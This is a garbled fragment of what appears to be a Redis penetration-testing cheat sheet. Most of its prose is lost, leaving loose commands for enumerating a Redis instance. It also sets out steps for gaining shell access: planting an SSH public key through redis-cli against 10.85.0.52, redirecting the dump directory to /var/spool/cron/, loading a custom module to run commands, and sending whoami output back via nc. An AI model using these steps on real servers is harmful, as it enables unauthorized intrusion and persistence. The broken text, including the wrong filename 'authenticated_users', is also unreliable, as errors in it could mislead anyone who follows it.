nc
or you could also use redis-cli
:info
. It may return output with information of the Redis instance or something like the following is returned:requirepass
or temporary until the service restarts connecting to it and running: config set requirepass [email protected]$12E45
.
Also, a username can be configured in the parameter masteruser
inside the redis.conf file.+OK
monitor
or get the top 25 slowest queries with slowlog get 25
info
inside the "Keyspace" chunk:-WRONGTYPE Operation against a key holding the wrong kind of value
while running GET <KEY>
it's because the key may be something else than a string or an integer and requires a special operator to display it.TYPE
command, example below for list and hash keys.config get dir
result can be changed after other manually exploit commands. Suggest to run it first right after login into Redis. In the output of config get dir
you could find the home of the redis user (usually /var/lib/redis or /home/redis/.ssh), and knowing this you know where you can write the authenticated_users
file to access via ssh with the user redis. If you know the home of other valid user where you have writable permissions you can also abuse it:ssh-keygen -t rsa
(echo -e "\n\n"; cat ~/id_rsa.pub; echo -e "\n\n") > spaced_key.txt
cat spaced_key.txt | redis-cli -h 10.85.0.52 -x set ssh_key
redis-cli -h 10.85.0.52 config set dir /var/spool/cron/
MODULE LOAD /path/to/mymodule.so
MODULE LIST
MODULE UNLOAD mymodule
whoami
and send back the output via nc
is:git
scheme and not with the http
scheme.